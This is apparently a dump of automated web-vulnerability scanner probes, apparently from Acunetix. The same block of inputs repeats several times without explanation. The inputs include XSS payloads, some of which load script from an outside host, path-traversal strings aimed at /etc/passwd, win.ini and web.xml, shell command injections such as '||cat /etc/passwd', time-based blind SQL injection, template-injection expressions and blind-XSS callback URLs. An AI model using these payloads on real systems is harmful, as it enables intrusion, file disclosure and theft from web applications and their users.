)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

comments

1

1

1

1

http://www.acunetix.tst

1

1

comments

1

&dir

'"

1

1

1'"()&%<ScRiPt >prompt(931236)</ScRiPt>

comments/.

-1

1

file:///etc/passwd

<!--

'&dir&'

1

1

-1)

1

1

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(975276)</ScRiPt>

-1))

WEB-INF/web.xml

1

1

1

CeAtTnsn'

1_973191

|dir

1

XonACK2u')

WEB-INF\web.xml

1

'|dir

1

0c0lyjmj'))

"|dir

../../../../../../../../../../windows/win.ini

1

acu6314<s1﹥s2ʺs3ʹuca6314

1

1

1

acux9672z1z2abcxuca9672

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(926778)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(999048)</script>

1

windowswin.ini

1

................windowswin.ini

1<ScRiPt >prompt(993861)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928758></ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(985287)</ScRiPt>

response.write(9303944*9775268)

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(988017)">

1

1

'+response.write(9303944*9775268)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952965)"></g></svg>

1

1

1

"+response.write(9303944*9775268)+"

1<div style=width:expression(prompt(972631))>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

WEB-INF/web.xml

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<body onload=prompt(973461)>

WEB-INF\web.xml

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

${99132+100065}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981952)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(968574)>

1

1&n904301=v916871

-1

1

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img/src=">" onerror=alert(910585)>

)

'|'ld

-1)

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt%20>prompt(954004)</sCripT>

1

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

"|"ld

testasp.vulnweb.com

1&lt

1

1

^(#$!@#$)(()))******

YTO09Tt9'

/../..//../..//../..//../..//../..//etc/passwd.jpg

7NjGZEJ3')

'"()

1

'

<img acu onmouseover=prompt(958164) //>

1

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

Y9voIS5Z'))

1

1

"

1

1<input autofocus onfocus=prompt(933164)>

'

1

1

/etc/passwd

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

"

<a href='http://www.acunetix.com'>website security</a>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

-1))

1

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit6h9lEnDvWk.bxss.me/

RmYXlaWw'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1_0HwHU <ScRiPt >prompt(902276)</ScRiPt>

acunetix_wvs_invalid_filename

1

1

................etc/passwd

AbdDwQau')

1

1

comments

'&dir&'

1

http://www.acunetix.tst

1

'"

YyvNPNhD'))

1'"()&%<ScRiPt >prompt(960749)</ScRiPt>

1

comments

1

"&dir&"

file:///etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(949723)</ScRiPt>

1

comments/.

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

1_905487

1

1

'|dir

1

WEB-INF/web.xml

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

acu1092<s1﹥s2ʺs3ʹuca1092

1

1

../../../../../../../../../../windows/win.ini

1

1

acux10415z1z2abcxuca10415

1

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(902885)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

windowswin.ini

1

1

1<script>prompt(982830)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(936324)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976446></ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(942097)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(916748)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903058)"></g></svg>

1

1

response.write(9107535*9582648)

1<div style=width:expression(prompt(967298))>

1

WEB-INF/web.xml

1

1

'+response.write(9107535*9582648)+'

&cat /etc/passwd&

1<iframe src='data:text/html

1

WEB-INF\web.xml

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

"+response.write(9107535*9582648)+"

1

1

1<body onload=prompt(923462)>

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975990)>

1

if(now()=sysdate(),sleep(3.14),0)/*'XOR(if(now()=sysdate(),sleep(3.14),0))OR'"XOR(if(now()=sysdate(),sleep(3.14),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

1

1

1<img src=xyz OnErRor=prompt(971345)>

(select(0)from(select(sleep(3.14)))v)/*'+(select(0)from(select(sleep(3.14)))v)+'"+(select(0)from(select(sleep(3.14)))v)+"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

`cat /etc/passwd`

-1

1<img/src=">" onerror=alert(906867)>

1

1

1

${100192+100373}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1<ScRiPt%20>prompt(942603)</sCripT>

1

|cat /etc/passwd#

1

1

1

1

-1))

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n907597=v909068

'|'ld

)

<img acu onmouseover=prompt(952149) //>

1

dY1UL0Dx'

1

'"()

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

1

"|"ld

1<input autofocus onfocus=prompt(977947)>

1

1

dbTdY0EB')

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

r7LWkgaL'))

1

1

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

[url=http://www.acunetix.com]website security[/url]

'

1

1

1

1_2Y1Zz <ScRiPt >prompt(920898)</ScRiPt>

1

1

"

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

acunetix_wvs_invalid_filename

1

http://hitiDH8Gv1ANV.bxss.me/

1

1

1

................etc/passwd

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

-1))

comments

1

1

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

GuQ6UGPw'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

wcIq8NfI')

'&dir&'

'"

1

1

file:///etc/passwd

1

comments/.

1'"()&%<ScRiPt >prompt(935910)</ScRiPt>

<!--

yI1khmhF'))

1

1

"&dir&"

'"()&%<ScRiPt >prompt(934015)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1_922252

1

|dir

1

WEB-INF/web.xml

1

1

'|dir

1

WEB-INF\web.xml

1

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

acu4728<s1﹥s2ʺs3ʹuca4728

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux9329z1z2abcxuca9329

1

1

windowswin.ini

1<ScRiPt >prompt(967991)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(944980)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(966090)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951657></ScRiPt>

1

1

1<ScRiPt >prompt(965419)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(933689)">

1

1

response.write(9244526*9133029)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983171)"></g></svg>

1

1

WEB-INF/web.xml

1

&cat /etc/passwd&

'+response.write(9244526*9133029)+'

1<div style=width:expression(prompt(936632))>

1

WEB-INF\web.xml

1

1

"+response.write(9244526*9133029)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

1

1

1<body onload=prompt(910654)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986810)>

1

cat /etc/passwd

1

${99627+99594}

1

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=xyz OnErRor=prompt(999061)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1

1<img/src=">" onerror=alert(915478)>

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1&n939715=v917762

)

1

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1<ScRiPt%20>prompt(905408)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

!(()&&!|*|*|

'|'ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'"()

1&lt

^(#$!@#$)(()))******

xYGDaDPq'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

testasp.vulnweb.com

1

<img acu onmouseover=prompt(947347) //>

1

1

21D3ucaP')

1

'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

wiPLNern'))

1<input autofocus onfocus=prompt(987864)>

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

.\./.\./.\./.\./.\./.\./etc/passwd

'

-1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

"

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

-1)

http://hitDxFMeOz9FE.bxss.me/

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_g8ZTF <ScRiPt >prompt(924771)</ScRiPt>

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

3aDIwzKq'

comments

&dir

1

'"

http://www.acunetix.tst

1

RbXJ3Tim')

................etc/passwd

1

comments/.

elIFZdUz'))

'&dir&'

1'"()&%<ScRiPt >prompt(920789)</ScRiPt>

<!--

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(929308)</ScRiPt>

"&dir&"

1

1

|dir

1

1_907367

file:///etc/passwd

1

1

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

"|dir

WEB-INF/web.xml

1

acu3482<s1﹥s2ʺs3ʹuca3482

1

1

WEB-INF\web.xml

1

1

1

acux5396z1z2abcxuca5396

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(975658)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(918647)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(988370)</ScRiPt>

1

1

1

windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960795></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(990388)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(971534)">

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

response.write(9924701*9084843)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972127)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(940610))>

'+response.write(9924701*9084843)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<iframe src='data:text/html

1

1

"+response.write(9924701*9084843)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1<body onload=prompt(963206)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973676)>

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<img src=xyz OnErRor=prompt(928378)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

1<img/src=">" onerror=alert(932300)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

${99968+100393}

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1<ScRiPt%20>prompt(937570)</sCripT>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n949619=v958868

1

1&lt

)

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

-1)

'"()

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<img acu onmouseover=prompt(945352) //>

1

1

"|"ld

-1))

1

^(#$!@#$)(()))******

testasp.vulnweb.com

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(930291)>

AAtYm0e2'

1

1

1

1

'

<a href='http://www.acunetix.com'>website security</a>

1

.\./.\./.\./.\./.\./.\./etc/passwd

OvHZZpae')

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

[url=http://www.acunetix.com]website security[/url]

1

ay5PBIIz'))

/etc/passwd

1

1

1

1

1_1Zm1N <ScRiPt >prompt(969007)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}

"

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://hitCNACr7afH5.bxss.me/

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

acunetix_wvs_invalid_filename

1

1

-1))

1

................etc/passwd

&dir

1

1

http://www.acunetix.tst

comments

1

'"

gD4sw5Py'

'&dir&'

comments

1

1

<!--

M2lhZJYH')

"&dir&"

1

1'"()&%<ScRiPt >prompt(995731)</ScRiPt>

1

comments/.

1

file:///etc/passwd

G7tI2gcU'))

1

|dir

1

1

1

'"()&%<ScRiPt >prompt(949525)</ScRiPt>

'|dir

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1_982408

"|dir

1

1

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

acu9278<s1﹥s2ʺs3ʹuca9278

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux9463z1z2abcxuca9463

1

1

windowswin.ini

1<ScRiPt >prompt(902721)</ScRiPt>

1

1

1

1

................windowswin.ini

1

1<script>prompt(962693)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(914567)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?922514></ScRiPt>

response.write(9211978*9002503)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(963753)</ScRiPt>

&cat /etc/passwd&

'+response.write(9211978*9002503)+'

1

1<video><source onerror="javascript:prompt(944394)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920001)"></g></svg>

'&cat /etc/passwd&'

"+response.write(9211978*9002503)+"

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1<div style=width:expression(prompt(908952))>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

${100039+100380}

1

`cat /etc/passwd`

1

1

1<body onload=prompt(940903)>

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1

1&n965249=v973521

|cat /etc/passwd#

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986330)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1some_inexistent_file_with_long_name%00.jpg

)

1

'|'ld

1

1

1

1<img src=xyz OnErRor=prompt(969053)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

"|"ld

1<img/src=">" onerror=alert(902147)>

1

hrRFIjaH'

^(#$!@#$)(()))******

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

1

1<ScRiPt%20>prompt(956263)</sCripT>

'

1

aKZzno3U')

1

1

/etc/passwd

1

1&lt

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

EP4D0Cin'))

'

1

1

<img acu onmouseover=prompt(922984) //>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

-1

1

1

"

1<input autofocus onfocus=prompt(966028)>

1

http://hiteqR8bWn99a.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1)

||cat /etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

................etc/passwd

-1))

1

&dir

[url=http://www.acunetix.com]website security[/url]

comments

1

http://www.acunetix.tst

'"

'&dir&'

MIRdQRYn'

comments

1'"()&%<ScRiPt >prompt(946541)</ScRiPt>

1_V1Elo <ScRiPt >prompt(950364)</ScRiPt>

1

<!--

1

1

"&dir&"

TBeBkuVd')

comments/.

1

'"()&%<ScRiPt >prompt(998151)</ScRiPt>

1

file:///etc/passwd

1

1

1

P7NOCTWL'))

1

|dir

1_947547

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

WEB-INF\web.xml

1

1

1

1

1

acu9563<s1﹥s2ʺs3ʹuca9563

../../../../../../../../../../windows/win.ini

1

acux4791z1z2abcxuca4791

1

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(983108)</ScRiPt>

1

1

1<script>prompt(988338)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(933515)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959033></ScRiPt>

1

windowswin.ini

1

1

1<ScRiPt >prompt(902207)</ScRiPt>

1

................windowswin.ini

1

1<video><source onerror="javascript:prompt(939106)">

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907224)"></g></svg>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

response.write(9092975*9339051)

1

1<div style=width:expression(prompt(973926))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9092975*9339051)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

"+response.write(9092975*9339051)+"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937564)>

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(957441)>

1

WEB-INF/web.xml

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

cat /etc/passwd

1<img src=xyz OnErRor=prompt(919988)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

WEB-INF\web.xml

1

`cat /etc/passwd`

-1

1<img/src=">" onerror=alert(981526)>

${100072+100455}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

-1)

|cat /etc/passwd#

1<ScRiPt%20>prompt(931035)</sCripT>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n945067=v923285

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

-1))

)

1&lt

1

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

<img acu onmouseover=prompt(906858) //>

VmGKOyVG'

!(()&&!|*|*|

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1<input autofocus onfocus=prompt(902694)>

SGOW6PFx')

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

testasp.vulnweb.com

1

<a href='http://www.acunetix.com'>website security</a>

'

'

wBqfAFdA'))

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

[url=http://www.acunetix.com]website security[/url]

1

1

1

"

1

1

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1_uGrCr <ScRiPt >prompt(900221)</ScRiPt>

-1)

http://hitlZgMGiNhbB.bxss.me/

||cat /etc/passwd

1

1

acunetix_wvs_invalid_filename

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

&dir

1

1

comments

1

1

vvAijoRJ'

1

http://www.acunetix.tst

comments

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'"

1

LjKuDDiF')

1

comments/.

"&dir&"

1

file:///etc/passwd

1

1'"()&%<ScRiPt >prompt(937829)</ScRiPt>

<!--

SgTqBu7G'))

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

'"()&%<ScRiPt >prompt(951534)</ScRiPt>

1

1

1

1

'|dir

1_947311

1

WEB-INF/web.xml

1

1

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

acu1392<s1﹥s2ʺs3ʹuca1392

1

../../../../../../../../../../boot.ini

1

acux4166z1z2abcxuca4166

1

1<ScRiPt >prompt(902929)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(932062)</script>

1

1

windowswin.ini

1<ScRiPt >prompt(916649)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969634></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(949671)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(987824)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(975779)"></g></svg>

1

response.write(9412389*9209370)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(953433))>

1

'+response.write(9412389*9209370)+'

1

1

1

1<iframe src='data:text/html

1

"+response.write(9412389*9209370)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<body onload=prompt(961647)>

1

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948994)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(939186)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<img/src=">" onerror=alert(983434)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1<ScRiPt%20>prompt(914870)</sCripT>

1

1

${100001+100177}

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

|cat /etc/passwd#

1&n966779=v906007

1some_inexistent_file_with_long_name%00.jpg

